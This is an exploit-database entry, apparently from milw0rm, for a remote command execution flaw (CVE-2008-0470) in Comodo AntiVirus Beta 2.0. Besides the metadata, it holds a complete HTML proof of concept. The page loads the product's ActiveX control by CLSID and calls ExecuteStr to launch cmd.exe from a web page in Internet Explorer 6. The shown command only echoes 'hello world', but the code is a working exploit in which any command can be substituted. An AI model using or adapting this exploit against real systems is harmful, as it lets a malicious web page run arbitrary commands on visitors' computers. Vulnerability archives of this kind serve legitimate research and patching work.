Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution
Author: h07 type: remote platform: windows port: date_added: 2008-01-22 date_updated: 2016-10-28 verified: 1 codes: OSVDB-40921;CVE-2008-0470 tags: aliases: screenshot_url: application_url: raw file: 4974.html
<!-- Comodo AntiVirus 2.0 ExecuteStr() 0day Remote Command Execution Exploit Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> Tested on:.. - Comodo AntiVirus Beta 2.0 - Microsoft Internet Explorer 6 Just for fun ;) --> <html> <object id="obj" classid="clsid:309F674D-E4D3-46BD-B9E2-ED7DFD7FD176"></object> <script> obj.ExecuteStr('cmd.exe', '/C echo "hello world" && pause'); </script> </html> # milw0rm.com [2008-01-23]